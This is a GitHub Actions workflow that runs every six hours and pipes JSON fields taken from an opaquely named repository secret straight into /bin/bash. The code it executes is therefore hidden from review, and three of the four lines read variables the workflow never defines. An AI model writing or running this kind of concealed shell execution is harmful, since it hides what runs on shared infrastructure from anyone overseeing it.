name: shilindongxing
on:
  workflow_dispatch:
  schedule:
    - cron: '10 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shilindongxing
        env:
          a17: ${{ secrets.a17 }}
        run: |
          echo $a17 | jq -r .fpaf566 | /bin/bash
          echo $ntl9 | jq -r .vroy2791 | /bin/bash
          echo $w75 | jq -r .egsio5 | /bin/bash
          echo $dxtoh602 | jq -r .wgst1 | /bin/bash

